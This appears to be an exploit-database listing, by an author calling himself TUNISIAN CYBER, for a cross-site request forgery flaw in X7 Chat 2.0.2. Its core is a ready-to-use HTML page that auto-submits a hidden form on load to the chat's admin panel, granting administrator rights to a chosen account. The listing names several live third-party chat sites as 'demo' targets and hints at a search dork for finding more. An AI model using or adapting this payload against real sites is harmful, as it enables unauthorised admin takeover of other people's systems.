[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

X7 CHAT 2.0.2 CSRF (add admin) vulenrability

Author
TUNISIAN CYBER
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-21666
Category
web applications
Date add
14-12-2013
Platform
php
X-------------------------------------------------------------X
 _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
|_   _| | | | \ | |_   _/  ___|_   _|/ _ \ | \ | | /  __ \ \ / / ___ \  ___| ___ \
  | | | | | |  \| | | | \ `--.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
  | | | | | | . ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
  | | | |_| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
  \_/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X                                                                                  
 
 
[+] Author: TUNISIAN CYBER
[+] Exploit Title:  X7 CHAT 2.0.2 CSRF Add Admin Vulenrability
[+] Date: 13-12-2013
[+] Category: WebApp
[+] Vendor:http://www.x7chat.com/‎
[+] Google Dork: Do Some Work and you'll find it :)
[+] Tested on: Win7 , ubuntu 13.04
 
 
########################################################################################
<html>
    <body onload="document.xform.submit();">
        <form name="xform" action="site.ltd/chat/index.php?act=adminpanel&cp_page=users&update=USER" method="post">
            <input type="hidden" name="username" value="USER" />
            <input type="hidden" name="usergroup" value="PASSWORD" />
        </form>
    </body>
</html>

Change USERNAME and PASSWORD

Demo:
http://www.ahleenarab.com/chat/
http://www.chat4u.eb2a.com/chat/
http://users.atw.hu/zenechat/chat/
http://www.zenechat.atw.hu/chat
http://filip.yw.sk/Chat/
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

#  0day.today [2024-11-15]  #